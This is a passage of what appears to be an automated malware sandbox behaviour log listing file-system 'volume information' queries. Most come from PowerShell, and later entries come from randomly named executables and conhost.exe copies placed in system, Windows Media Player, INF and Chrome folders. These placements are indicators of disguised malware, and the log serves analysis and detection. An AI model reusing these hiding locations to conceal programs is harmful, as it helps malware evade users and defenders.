                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeQueries volume information: C:\Program Files\Google\Chrome\Application\conhost.exe VolumeInformation
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
